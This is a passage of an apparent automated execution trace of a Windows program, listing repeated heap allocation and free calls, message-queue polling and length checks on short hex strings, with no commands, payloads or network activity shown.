dwFlags=0x0, lpMem=0x29e0650 | out: hHeap=0x2af0000) returned 1 [0081.307] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64288 | out: hHeap=0x2af0000) returned 1 [0081.307] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0530 | out: hHeap=0x2af0000) returned 1 [0081.307] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64450 | out: hHeap=0x2af0000) returned 1 [0081.308] PeekMessageW (in: lpMsg=0x8cedf0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedf0) returned 0 [0081.308] PeekMessageW (in: lpMsg=0x8cedf0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedf0) returned 0 [0081.308] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e04f0 [0081.308] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a643d8 [0081.308] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64360 [0081.308] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0630 [0081.308] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64390 [0081.308] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a641b0 [0081.308] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0670 [0081.308] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a643c0 [0081.308] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64210 [0081.308] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e05e0 [0081.308] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a641f8 [0081.308] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e05e0 | out: hHeap=0x2af0000) returned 1 [0081.308] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a643f0 [0081.308] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0650 [0081.308] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0650 | out: hHeap=0x2af0000) returned 1 [0081.308] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64378 [0081.308] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e06a0 [0081.308] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e06a0 | out: hHeap=0x2af0000) returned 1 [0081.308] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a643a8 [0081.308] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x29e05e0 [0081.308] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64228 [0081.308] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a641f8 | out: hHeap=0x2af0000) returned 1 [0081.308] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64210 | out: hHeap=0x2af0000) returned 1 [0081.308] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a643f0 | out: hHeap=0x2af0000) returned 1 [0081.308] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64378 | out: hHeap=0x2af0000) returned 1 [0081.308] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a643c0 | out: hHeap=0x2af0000) returned 1 [0081.308] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0670 | out: hHeap=0x2af0000) returned 1 [0081.308] lstrlenW (lpString="65") returned 2 [0081.308] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a643a8 | out: hHeap=0x2af0000) returned 1 [0081.308] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e05e0 | out: hHeap=0x2af0000) returned 1 [0081.308] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64228 | out: hHeap=0x2af0000) returned 1 [0081.308] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a641b0 | out: hHeap=0x2af0000) returned 1 [0081.308] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64390 | out: hHeap=0x2af0000) returned 1 [0081.308] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0630 | out: hHeap=0x2af0000) returned 1 [0081.308] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64450 [0081.309] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a642e8 [0081.309] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x29e0500 [0081.309] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64360 | out: hHeap=0x2af0000) returned 1 [0081.309] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a643d8 | out: hHeap=0x2af0000) returned 1 [0081.309] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e04f0 | out: hHeap=0x2af0000) returned 1 [0081.309] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a642e8 | out: hHeap=0x2af0000) returned 1 [0081.309] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0500 | out: hHeap=0x2af0000) returned 1 [0081.309] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64450 | out: hHeap=0x2af0000) returned 1 [0081.309] PeekMessageW (in: lpMsg=0x8cedf0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedf0) returned 0 [0081.309] PeekMessageW (in: lpMsg=0x8cedf0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedf0) returned 0 [0081.309] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0660 [0081.309] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64480 [0081.309] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a641f8 [0081.309] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e05e0 [0081.309] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a642a0 [0081.309] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a642b8 [0081.309] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0630 [0081.309] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64408 [0081.309] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64270 [0081.309] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0640 [0081.309] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64288 [0081.309] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0640 | out: hHeap=0x2af0000) returned 1 [0081.309] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a641e0 [0081.309] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0530 [0081.309] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0530 | out: hHeap=0x2af0000) returned 1 [0081.309] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64330 [0081.309] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e04e0 [0081.309] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e04e0 | out: hHeap=0x2af0000) returned 1 [0081.309] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64498 [0081.309] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x29e0570 [0081.309] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64348 [0081.309] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64288 | out: hHeap=0x2af0000) returned 1 [0081.309] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64270 | out: hHeap=0x2af0000) returned 1 [0081.309] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a641e0 | out: hHeap=0x2af0000) returned 1 [0081.309] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64330 | out: hHeap=0x2af0000) returned 1 [0081.309] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64408 | out: hHeap=0x2af0000) returned 1 [0081.309] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0630 | out: hHeap=0x2af0000) returned 1 [0081.310] lstrlenW (lpString="6D") returned 2 [0081.310] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64498 | out: hHeap=0x2af0000) returned 1 [0081.310] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0570 | out: hHeap=0x2af0000) returned 1 [0081.310] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64348 | out: hHeap=0x2af0000) returned 1 [0081.310] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a642b8 | out: hHeap=0x2af0000) returned 1 [0081.310] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a642a0 | out: hHeap=0x2af0000) returned 1 [0081.310] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e05e0 | out: hHeap=0x2af0000) returned 1 [0081.310] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64438 [0081.310] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a642e8 [0081.310] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x29e05d0 [0081.310] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a641f8 | out: hHeap=0x2af0000) returned 1 [0081.310] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64480 | out: hHeap=0x2af0000) returned 1 [0081.310] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0660 | out: hHeap=0x2af0000) returned 1 [0081.310] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a642e8 | out: hHeap=0x2af0000) returned 1 [0081.310] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e05d0 | out: hHeap=0x2af0000) returned 1 [0081.310] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64438 | out: hHeap=0x2af0000) returned 1 [0081.310] PeekMessageW (in: lpMsg=0x8cedf0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedf0) returned 0 [0081.310] PeekMessageW (in: lpMsg=0x8cedf0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedf0) returned 0 [0081.310] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e04f0 [0081.310] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a642d0 [0081.310] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a641b0 [0081.310] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e04e0 [0081.310] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64468 [0081.310] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64498 [0081.310] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0620 [0081.310] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64450 [0081.310] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a643c0 [0081.310] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e05d0 [0081.310] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64420 [0081.310] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e05d0 | out: hHeap=0x2af0000) returned 1 [0081.310] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64318 [0081.310] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0510 [0081.310] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0510 | out: hHeap=0x2af0000) returned 1 [0081.310] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64480 [0081.310] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e04b0 [0081.310] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e04b0 | out: hHeap=0x2af0000) returned 1 [0081.310] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a643f0 [0081.311] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x29e05f0 [0081.311] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64270 [0081.311] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64420 | out: hHeap=0x2af0000) returned 1 [0081.311] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a643c0 | out: hHeap=0x2af0000) returned 1 [0081.311] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64318 | out: hHeap=0x2af0000) returned 1 [0081.311] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64480 | out: hHeap=0x2af0000) returned 1 [0081.311] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64450 | out: hHeap=0x2af0000) returned 1 [0081.311] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0620 | out: hHeap=0x2af0000) returned 1 [0081.311] lstrlenW (lpString="70") returned 2 [0081.311] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a643f0 | out: hHeap=0x2af0000) returned 1 [0081.311] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e05f0 | out: hHeap=0x2af0000) returned 1 [0081.311] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64270 | out: hHeap=0x2af0000) returned 1 [0081.311] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64498 | out: hHeap=0x2af0000) returned 1 [0081.311] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64468 | out: hHeap=0x2af0000) returned 1 [0081.311] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e04e0 | out: hHeap=0x2af0000) returned 1 [0081.311] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a641e0 [0081.311] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64240 [0081.311] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x29e0670 [0081.311] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a641b0 | out: hHeap=0x2af0000) returned 1 [0081.311] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a642d0 | out: hHeap=0x2af0000) returned 1 [0081.311] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e04f0 | out: hHeap=0x2af0000) returned 1 [0081.311] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64240 | out: hHeap=0x2af0000) returned 1 [0081.311] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0670 | out: hHeap=0x2af0000) returned 1 [0081.311] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a641e0 | out: hHeap=0x2af0000) returned 1 [0081.311] PeekMessageW (in: lpMsg=0x8cedf0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedf0) returned 0 [0081.311] PeekMessageW (in: lpMsg=0x8cedf0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedf0) returned 0 [0081.311] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0500 [0081.311] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64240 [0081.311] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64270 [0081.311] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0660 [0081.311] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a642d0 [0081.311] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a642b8 [0081.311] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0550 [0081.311] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64318 [0081.311] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64480 [0081.311] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e05c0 [0081.312] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64258 [0081.312] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e05c0 | out: hHeap=0x2af0000) returned 1 [0081.312] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64288 [0081.312] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e06a0 [0081.312] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e06a0 | out: hHeap=0x2af0000) returned 1 [0081.312] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a643c0 [0081.312] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0510 [0081.312] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0510 | out: hHeap=0x2af0000) returned 1 [0081.312] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a641e0 [0081.312] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x29e0680 [0081.312] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64330 [0081.312] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64258 | out: hHeap=0x2af0000) returned 1 [0081.312] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64480 | out: hHeap=0x2af0000) returned 1 [0081.312] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64288 | out: hHeap=0x2af0000) returned 1 [0081.312] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a643c0 | out: hHeap=0x2af0000) returned 1 [0081.312] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64318 | out: hHeap=0x2af0000) returned 1 [0081.312] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0550 | out: hHeap=0x2af0000) returned 1 [0081.312] lstrlenW (lpString="44") returned 2 [0081.312] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a641e0 | out: hHeap=0x2af0000) returned 1 [0081.312] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0680 | out: hHeap=0x2af0000) returned 1 [0081.312] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64330 | out: hHeap=0x2af0000) returned 1 [0081.312] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a642b8 | out: hHeap=0x2af0000) returned 1 [0081.312] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a642d0 | out: hHeap=0x2af0000) returned 1 [0081.312] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0660 | out: hHeap=0x2af0000) returned 1 [0081.312] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64390 [0081.312] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64288 [0081.312] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x29e0630 [0081.312] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64270 | out: hHeap=0x2af0000) returned 1 [0081.312] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64240 | out: hHeap=0x2af0000) returned 1 [0081.312] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0500 | out: hHeap=0x2af0000) returned 1 [0081.312] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64288 | out: hHeap=0x2af0000) returned 1 [0081.312] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0630 | out: hHeap=0x2af0000) returned 1 [0081.312] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64390 | out: hHeap=0x2af0000) returned 1 [0081.312] PeekMessageW (in: lpMsg=0x8cedf0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedf0) returned 0 [0081.312] PeekMessageW (in: lpMsg=0x8cedf0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedf0) returned 0 [0081.312] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0540 [0081.312] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64438 [0081.313] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64498 [0081.313] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0640 [0081.313] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64360 [0081.313] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64378 [0081.313] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0620 [0081.313] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a642a0 [0081.313] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64390 [0081.313] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e05b0 [0081.313] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a643c0 [0081.313] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e05b0 | out: hHeap=0x2af0000) returned 1 [0081.313] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a641e0 [0081.313] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0570 [0081.313] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0570 | out: hHeap=0x2af0000) returned 1 [0081.313] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a643d8 [0081.313] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e04f0 [0081.313] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e04f0 | out: hHeap=0x2af0000) returned 1 [0081.313] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64420 [0081.313] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x29e0570 [0081.313] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a643f0 [0081.313] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a643c0 | out: hHeap=0x2af0000) returned 1 [0081.313] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64390 | out: hHeap=0x2af0000) returned 1 [0081.313] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a641e0 | out: hHeap=0x2af0000) returned 1 [0081.313] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a643d8 | out: hHeap=0x2af0000) returned 1 [0081.313] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a642a0 | out: hHeap=0x2af0000) returned 1 [0081.313] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0620 | out: hHeap=0x2af0000) returned 1 [0081.313] lstrlenW (lpString="69") returned 2 [0081.313] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64420 | out: hHeap=0x2af0000) returned 1 [0081.313] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0570 | out: hHeap=0x2af0000) returned 1 [0081.313] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a643f0 | out: hHeap=0x2af0000) returned 1 [0081.313] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64378 | out: hHeap=0x2af0000) returned 1 [0081.313] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64360 | out: hHeap=0x2af0000) returned 1 [0081.313] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0640 | out: hHeap=0x2af0000) returned 1 [0081.313] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64360 [0081.313] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64240 [0081.313] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x29e0610 [0081.313] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64498 | out: hHeap=0x2af0000) returned 1 [0081.313] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64438 | out: hHeap=0x2af0000) returned 1 [0081.314] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0540 | out: hHeap=0x2af0000) returned 1 [0081.314] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64240 | out: hHeap=0x2af0000) returned 1 [0081.314] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0610 | out: hHeap=0x2af0000) returned 1 [0081.314] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64360 | out: hHeap=0x2af0000) returned 1 [0081.314] PeekMessageW (in: lpMsg=0x8cedf0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedf0) returned 0 [0081.314] PeekMessageW (in: lpMsg=0x8cedf0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedf0) returned 0 [0081.314] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e04f0 [0081.314] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a643c0 [0081.314] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64360 [0081.314] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0680 [0081.314] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64378 [0081.314] RtlAllocateHeap 